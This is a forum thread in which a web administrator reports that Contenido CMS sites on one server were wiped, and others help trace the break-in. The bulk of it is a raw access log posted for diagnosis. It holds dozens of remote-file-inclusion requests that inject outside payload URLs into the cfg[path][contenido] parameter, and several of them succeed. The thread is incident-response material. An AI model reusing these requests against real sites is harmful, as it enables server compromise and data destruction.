Page 1 of 2

Hack attack, all data from the 777 directories gone

Posted: Tue 10 Jun 2008, 09:40
by Martin S.
Hello everyone, today I, or rather my customers, fell victim to a hack attack. All files from the 777 directories were deleted, so upload has no images any more, css no styles and templates no HTML files; I also saw that the cronjobs folder was set to a current creation date. Has any of you had experiences like this? In my case it's almost 20 systems with a wide range of versions from 4.6 to 4.8; I do have backups of everything, but a restore doesn't fix the security hole.

Posted: Tue 10 Jun 2008, 09:54
by Halchteranerin
Were those freshly installed 4.6-4.8 systems, or ones that were upgraded from old versions? Are there files on the server that don't belong there?

Posted: Tue 10 Jun 2008, 09:58
by tono
Which version is the affected system running? Or are all 20 affected?

Look in the web server access log files around the time it happened (the cronjobs modification date) to find out how the hackers broke in.

Posted: Tue 10 Jun 2008, 09:58
by Dodger77
It would also be interesting to know whether this happened at different web hosts or possibly even on exactly one server. With the 4.6.x versions the exact version matters as well.

Can the attack path be traced through the log files? Does the following string appear there:

Code:

cfg[path][contenido]=http
? Has the web host said anything about the hack yet?

Posted: Tue 10 Jun 2008, 10:00
by tono
Oh, cool 8) Three posts written in parallel at once. And then people say SECURITY isn't taken seriously here

Posted: Tue 10 Jun 2008, 10:10
by Halchteranerin
tono wrote: Oh, cool 8) Three posts written in parallel at once. And then people say SECURITY isn't taken seriously here
:mrgreen:

Posted: Tue 10 Jun 2008, 10:13
by Martin S.
First of all, thanks for the quick response. The attacks all happened on one server. Here I have a folder cms and then kunde 1, kunde 2 and so on. Various systems have been set up here over the last few years; since some customers don't always provide the necessary funds for security, not all systems have always been brought up to the latest versions, which is why the following versions exist here: 4.6.8, 4.6.15, 4.6.23, 4.8.2.
The htaccess settings contain the following:

php_flag magic_quotes_gpc on
php_flag register_long_arrays on
php_flag display_errors on
php_flag register_globals on
php_flag allow_call_time_pass_reference on

I can't look at the server's log files yet because I don't have root access. But going by the time it looks as if it happened on 09.06.2008 - 08:15, because that is the creation date the cronjobs folder has.

Posted: Tue 10 Jun 2008, 10:31
by Martin S.
I now have the log files; when I search for cfg[path][contenido]=http I get the following result, sorry, it's a bit long. I'm not exactly an expert at interpreting logs, does this mean anything to you?!

Code:

67.228.91.67 - - [01/Jun/2008:04:53:47 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.811"
67.228.91.67 - - [01/Jun/2008:04:53:47 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.811"
67.228.91.67 - - [01/Jun/2008:04:53:48 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.811"
72.21.38.82 - - [01/Jun/2008:05:24:07 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.810"
72.21.38.82 - - [01/Jun/2008:05:24:08 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.810"
72.21.38.82 - - [01/Jun/2008:05:24:08 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.810"
70.84.106.68 - - [01/Jun/2008:05:24:11 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.810"
70.84.106.68 - - [01/Jun/2008:05:24:12 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.810"
70.84.106.68 - - [01/Jun/2008:05:24:12 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.810"
69.72.215.178 - - [01/Jun/2008:05:24:21 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.810"
69.72.215.178 - - [01/Jun/2008:05:24:21 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.810"
69.72.215.178 - - [01/Jun/2008:05:24:21 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.810"
80.86.92.124 - - [01/Jun/2008:05:24:22 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.76"
80.86.92.124 - - [01/Jun/2008:05:24:22 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.76"
80.86.92.124 - - [01/Jun/2008:05:24:22 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.76"
77.221.157.210 - - [01/Jun/2008:18:11:27 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://food.kyungnam.ac.kr/board/skin/zero_vote/images/borda2.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
77.221.157.210 - - [01/Jun/2008:18:11:27 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://food.kyungnam.ac.kr/board/skin/zero_vote/images/borda2.jpg? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
77.221.157.210 - - [01/Jun/2008:18:11:27 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://food.kyungnam.ac.kr/board/skin/zero_vote/images/borda2.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
58.181.249.244 - - [01/Jun/2008:18:55:12 +0200] "GET /cms/klemm/contenido/includes/include.frontend.group.subnav.php?cfg[path][contenido]=http://itmovement.com/taxy/templates_nogui/editor/_samples/mod.txt?? HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible;)"
83.218.64.197 - - [01/Jun/2008:23:44:58 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/idi.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
83.218.64.197 - - [01/Jun/2008:23:44:58 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/idi.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
83.218.64.197 - - [01/Jun/2008:23:44:58 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/idi.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 402 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 402 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:45:36 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:46:31 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 402 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:46:32 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.65"
84.19.182.184 - - [01/Jun/2008:23:46:32 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.65"
213.180.89.68 - - [01/Jun/2008:23:50:22 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
213.180.89.68 - - [01/Jun/2008:23:50:27 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
213.180.89.68 - - [01/Jun/2008:23:50:27 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
72.36.224.170 - - [01/Jun/2008:23:53:20 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://meganfoxfans.net/images/echo.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.811"
72.36.224.170 - - [01/Jun/2008:23:53:20 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://meganfoxfans.net/images/echo.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.811"
72.36.224.170 - - [01/Jun/2008:23:53:20 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://meganfoxfans.net/images/echo.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.811"
203.189.129.129 - - [01/Jun/2008:23:54:57 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.walmax.eu/upload/.help/test.txt??? HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
203.189.129.129 - - [01/Jun/2008:23:54:57 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.walmax.eu/upload/.help/test.txt??? HTTP/1.0" 404 388 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
218.38.34.67 - - [01/Jun/2008:23:55:57 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.helmos.gr/helmos_en/links/test.txt?? HTTP/1.1" 404 388 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
218.38.34.67 - - [01/Jun/2008:23:55:57 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.helmos.gr/helmos_en/links/test.txt?? HTTP/1.1" 404 402 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
213.180.89.68 - - [02/Jun/2008:00:07:36 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
213.180.89.68 - - [02/Jun/2008:00:07:37 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
213.180.89.68 - - [02/Jun/2008:00:07:37 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
200.80.42.159 - - [02/Jun/2008:00:11:54 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
200.80.42.159 - - [02/Jun/2008:00:11:55 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
200.80.42.159 - - [02/Jun/2008:00:11:55 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
85.25.10.95 - - [02/Jun/2008:00:30:36 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 402 "-" "Advanced Browser (http://www.avantbrowser.com)"
85.25.10.95 - - [02/Jun/2008:00:30:37 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 388 "-" "Advanced Browser (http://www.avantbrowser.com)"
80.67.26.67 - - [02/Jun/2008:01:40:43 +0200] "GET /cms/klemm/cms/front_content.php//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.madbutphat.de//include/template/templates_c/.../contr2.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.808"
80.67.26.67 - - [02/Jun/2008:01:40:43 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.madbutphat.de//include/template/templates_c/.../contr2.txt?? HTTP/1.1" 404 403 "-" "libwww-perl/5.808"
80.67.26.67 - - [02/Jun/2008:01:54:32 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.madbutphat.de//include/template/templates_c/.../contr2.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.808"
80.67.26.67 - - [02/Jun/2008:01:54:33 +0200] "GET /cms/klemm/cms/front_content.php//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.madbutphat.de//include/template/templates_c/.../contr2.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.808"
80.67.26.67 - - [02/Jun/2008:01:54:33 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.madbutphat.de//include/template/templates_c/.../contr2.txt?? HTTP/1.1" 404 403 "-" "libwww-perl/5.808"
88.199.39.252 - - [02/Jun/2008:09:48:24 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id-gun.txt? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
88.199.39.252 - - [02/Jun/2008:09:48:24 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id-gun.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
88.199.39.252 - - [02/Jun/2008:09:48:24 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://wellingtonindustries.com/id-gun.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
72.47.204.44 - - [02/Jun/2008:10:06:43 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bestpaket.ru/netcat//dump/alba.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
72.47.204.44 - - [02/Jun/2008:10:06:43 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bestpaket.ru/netcat//dump/alba.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
72.47.204.44 - - [02/Jun/2008:10:06:44 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bestpaket.ru/netcat//dump/alba.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
217.20.118.202 - - [02/Jun/2008:12:03:31 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
217.20.118.202 - - [02/Jun/2008:12:03:33 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
217.20.118.202 - - [02/Jun/2008:12:03:38 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:19:47 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:19:47 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:19:47 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:20:20 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:20:20 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
212.83.213.66 - - [02/Jun/2008:12:20:20 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
85.214.95.209 - - [02/Jun/2008:22:48:25 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
85.214.95.209 - - [02/Jun/2008:22:48:25 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
85.214.95.209 - - [02/Jun/2008:22:48:25 +0200] "GET /cms/klemm/cms/front_content.php/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
85.214.95.209 - - [02/Jun/2008:22:52:25 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://o-x-r-a-n-a.ru/forum/language/.lang/idpoi.txt???? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
70.168.36.247 - - [03/Jun/2008:03:57:49 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://mypoems.kaykelly.net/SMF/Sources/borda2.jpg? HTTP/1.1" 404 402 "-" "libwww-perl/5.803"
70.168.36.247 - - [03/Jun/2008:03:57:55 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://mypoems.kaykelly.net/SMF/Sources/borda2.jpg? HTTP/1.1" 200 - "-" "libwww-perl/5.803"
64.38.8.186 - - [03/Jun/2008:08:17:55 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.tripiwarez.eu/script/blid.txt? HTTP/1.1" 404 402 "-" "libwww-perl/5.811"
64.38.8.186 - - [03/Jun/2008:08:17:55 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.tripiwarez.eu/script/blid.txt? HTTP/1.1" 404 388 "-" "libwww-perl/5.811"
64.38.8.186 - - [03/Jun/2008:08:17:56 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.tripiwarez.eu/script/blid.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.811"
74.53.240.146 - - [04/Jun/2008:00:44:01 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.urania-ffo.de/Kalender//tools/install/cmd.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
74.53.240.146 - - [04/Jun/2008:00:44:01 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.urania-ffo.de/Kalender//tools/install/cmd.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
74.53.240.146 - - [04/Jun/2008:00:44:01 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.urania-ffo.de/Kalender//tools/install/cmd.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
74.53.240.146 - - [04/Jun/2008:00:44:58 +0200] "GET /cms/klemm/cms/front_content.php?changelang=2/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.urania-ffo.de/Kalender//tools/install/cmd.txt??? HTTP/1.1" 200 10304 "-" "libwww-perl/5.79"
66.246.185.183 - - [07/Jun/2008:19:14:18 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.810"
66.246.185.183 - - [07/Jun/2008:19:14:19 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.810"
66.246.185.183 - - [07/Jun/2008:19:14:19 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.810"
67.15.205.17 - - [07/Jun/2008:19:15:33 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.811"
67.15.205.17 - - [07/Jun/2008:19:15:33 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.811"
67.15.205.17 - - [07/Jun/2008:19:15:33 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://3oliver.com/dev/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.811"
216.127.70.91 - - [07/Jun/2008:19:25:01 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:01 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:01 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:04 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:04 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:04 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:08 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 402 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:08 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 388 "-" "libwww-perl/5.79"
216.127.70.91 - - [07/Jun/2008:19:25:08 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.79"
87.106.178.42 - - [07/Jun/2008:19:50:02 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 402 "-" "libwww-perl/5.805"
87.106.178.42 - - [07/Jun/2008:19:50:02 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
87.106.178.42 - - [07/Jun/2008:19:50:02 +0200] "GET /cms/klemm/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
212.227.65.79 - - [07/Jun/2008:20:37:46 +0200] "GET /cms/klemm/cms/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 402 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
212.227.65.79 - - [07/Jun/2008:20:37:46 +0200] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 388 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
89.218.85.18 - - [08/Jun/2008:06:14:05 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 403 "-" "libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:06:14:05 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:06:14:05 +0200] "GET /cms/klemm//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.805"
62.140.19.142 - - [08/Jun/2008:06:17:55 +0200] "GET /cms/klemm/cms//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 403 "-" "libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:06:17:55 +0200] "GET //contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 388 "-" "libwww-perl/5.76"
62.140.19.142 - - [08/Jun/2008:06:17:55 +0200] "GET /cms/klemm//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 200 - "-" "libwww-perl/5.76"
